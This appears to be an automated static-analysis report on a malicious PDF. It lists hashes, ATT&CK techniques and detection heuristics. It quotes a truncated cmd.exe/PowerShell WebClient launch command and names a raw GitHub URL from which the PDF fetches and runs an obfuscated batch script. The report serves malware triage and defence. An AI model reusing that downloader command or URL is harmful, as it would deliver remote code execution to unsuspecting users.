Malicious PDF — malware analysis report

Static analysis result for SHA-256 853a1ed056c76106…

MALICIOUS

PDF

1.6 KB
MD5: fb020867b094aa3ff3755c114ac0dd4a SHA-1: bc63d1bb98fc4ba0dd54e78fe0acbe00dbe44511 SHA-256: 853a1ed056c761065c6382f3e1608f1598fb3999201160f222fc221637514f5f
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded scripts and launch actions designed to execute a command. This command attempts to download and execute a batch script from a GitHub URL using PowerShell. The embedded script itself is a truncated command that initiates this download and execution process, indicating a downloader or initial access payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9968

Heuristics 7

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • OpenAction trigger high PDF_OPENACTION
    PDF has an /OpenAction that launches, submits, or opens an external target
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://raw.githubusercontent.com/bao3125/32/main/d-obf.bat

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_0000016a.bin
1838e3b06a1789712530f7229448c15cd27990882b50f5a343b5824148e54dbc		 pdf-embedded-script PDF decompressed stream script payload at offset 0x16A 66 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 shell/COM execution token(s).

Open this report in the interactive analyzer, or submit your own file for analysis.